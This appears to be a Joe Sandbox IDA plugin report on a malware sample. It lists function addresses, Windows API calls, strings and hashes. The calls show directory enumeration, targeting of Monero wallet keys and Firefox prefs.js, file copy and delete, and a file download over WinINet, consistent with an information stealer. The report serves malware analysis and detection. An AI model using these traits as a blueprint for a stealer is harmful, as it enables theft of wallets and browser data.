Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction ID: 14d1dd1505aced9cd8b45279eaef959e336740e5ad629c5ecbd62bb5e6e0c917
Opcode Fuzzy Hash: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction Fuzzy Hash: B0B1B4B1B083509FDB08DF2AC89461AB7F5EB8A700F15893DF499D3790D770A9018B8E

Function 000B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 000B492C
FindFirstFileA.KERNEL32(?,?), ref: 000B4943
StrCmpCA.SHLWAPI(?,000C0FDC), ref: 000B4971
StrCmpCA.SHLWAPI(?,000C0FE0), ref: 000B4987
FindNextFileA.KERNEL32(000000FF,?), ref: 000B4B7D
FindClose.KERNEL32(000000FF), ref: 000B4B92

Strings

%s\%s, xrefs: 000B49A4
%s\%s, xrefs: 000B49FB
%s\*, xrefs: 000B4920

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 8c470d00ad389fb80482848ddc9bd5441248634af6488a264a69e5487983e30d
Instruction ID: 7069a58292e72fa43f44a50908a656a791c80cb822e11f3ffade268a6d02640d
Opcode Fuzzy Hash: 8c470d00ad389fb80482848ddc9bd5441248634af6488a264a69e5487983e30d
Instruction Fuzzy Hash: AC613771940218ABCB24EFA0EC89FEE73BCBB49701F04459CB64996141EB75AB85CF91

Function 000B3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 000B3EC3
FindFirstFileA.KERNEL32(?,?), ref: 000B3EDA
StrCmpCA.SHLWAPI(?,000C0FAC), ref: 000B3F08
StrCmpCA.SHLWAPI(?,000C0FB0), ref: 000B3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 000B406C
FindClose.KERNEL32(000000FF), ref: 000B4081

Strings

%s\%s, xrefs: 000B3EB7

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: e34aba7d13729b48b6928aeab495622436fdac9a457bc215cf345360225ebfe3
Instruction ID: dba63033e7e0ac5f82e05069c4457baca4b85f9e83928717db66d5a37be92f53
Opcode Fuzzy Hash: e34aba7d13729b48b6928aeab495622436fdac9a457bc215cf345360225ebfe3
Instruction Fuzzy Hash: 7F5147B6900218ABCB24EBB0DC89EEE737CBB58300F44459CF65996051DB75EB85CF51

Function 000AF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000C15B8,000C0D96), ref: 000AF71E
StrCmpCA.SHLWAPI(?,000C15BC), ref: 000AF76F
StrCmpCA.SHLWAPI(?,000C15C0), ref: 000AF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 000AFAB1
FindClose.KERNEL32(000000FF), ref: 000AFAC3

Strings

prefs.js, xrefs: 000AF812

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 184e11e4df3e761ef176fb71d300380c5fec50ab10a759a011be9142dea50990
Instruction ID: 092a4a89ab3e312576fa634720fe110391c57f1e54beebfcdce2e54ec185cae8
Opcode Fuzzy Hash: 184e11e4df3e761ef176fb71d300380c5fec50ab10a759a011be9142dea50990
Instruction Fuzzy Hash: 0CB12871A00119ABDB24FFA0DC95FED7379AF56300F4085A8E50A9B552EF306B49CF92

Function 000A16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000C510C,?,?,?,000C51B4,?,?,00000000,?,00000000), ref: 000A1923
StrCmpCA.SHLWAPI(?,000C525C), ref: 000A1973
StrCmpCA.SHLWAPI(?,000C5304), ref: 000A1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000A1D40
DeleteFileA.KERNEL32(00000000), ref: 000A1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 000A1E20
FindClose.KERNEL32(000000FF), ref: 000A1E32

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Strings

\*.*, xrefs: 000A17F1

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 87741429e8140cd3eaa71ddcf9819d5bd2903a2adcd4cd8a72071d95c66d76cf
Instruction ID: 53ff135387367c4fc54e888a5b7de110a06c532341ed94d25af3886551211b4e
Opcode Fuzzy Hash: 87741429e8140cd3eaa71ddcf9819d5bd2903a2adcd4cd8a72071d95c66d76cf
Instruction Fuzzy Hash: E612F471A10118BBDB25FB60DCA6EEE737CAF55300F404599B50A66492EF306F89CFA1

Function 000ADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000C14B0,000C0C2A), ref: 000ADAEB
StrCmpCA.SHLWAPI(?,000C14B4), ref: 000ADB33
StrCmpCA.SHLWAPI(?,000C14B8), ref: 000ADB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 000ADDCC
FindClose.KERNEL32(000000FF), ref: 000ADDDE

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 3259658d2ce68143e964abe5eae0282060d91fc5e5e4e8135a6ef1f68b266c34
Instruction ID: 766021099d6bd0a1deeb8b0756154c6f80e3e9257561aa2155a119bf323ea858
Opcode Fuzzy Hash: 3259658d2ce68143e964abe5eae0282060d91fc5e5e4e8135a6ef1f68b266c34
Instruction Fuzzy Hash: 04914872A04104A7CB14FBB0EC96DED737DAF86300F408559F90B96582EE34AB1DCB92

Function 000A60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000A4839
Part of subcall function 000A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000A4849

InternetOpenA.WININET(000C0DF7,00000001,00000000,00000000,00000000), ref: 000A610F
StrCmpCA.SHLWAPI(?,0139F5E0), ref: 000A6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000A618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000A61B3
InternetReadFile.WININET(?,?,00000400,?), ref: 000A61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000A620A
CloseHandle.KERNEL32(?,?,00000400), ref: 000A6249
InternetCloseHandle.WININET(?), ref: 000A6253
InternetCloseHandle.WININET(00000000), ref: 000A6260

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 8c26f4af5f13c5b0e7f8767e19ff88aa78b274453e9ed5a29a98c38212836106
Instruction ID: fef31076f0bbe2da4a3888dc01bf229c88ba9b1644429b2b3ada789cec5e60a6
Opcode Fuzzy Hash: 8c26f4af5f13c5b0e7f8767e19ff88aa78b274453e9ed5a29a98c38212836106
Instruction Fuzzy Hash: B05196B1A40218ABDF20DFA0DC49BEE77B8FB45701F148098F605AB1C1DB756A89CF95

Function 000B7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

GetKeyboardLayoutList.USER32(00000000,00000000,000C05AF), ref: 000B7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 000B7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 000B7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000B7C62
LocalFree.KERNEL32(00000000), ref: 000B7D22

Strings

/ , xrefs: 000B7C7F

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

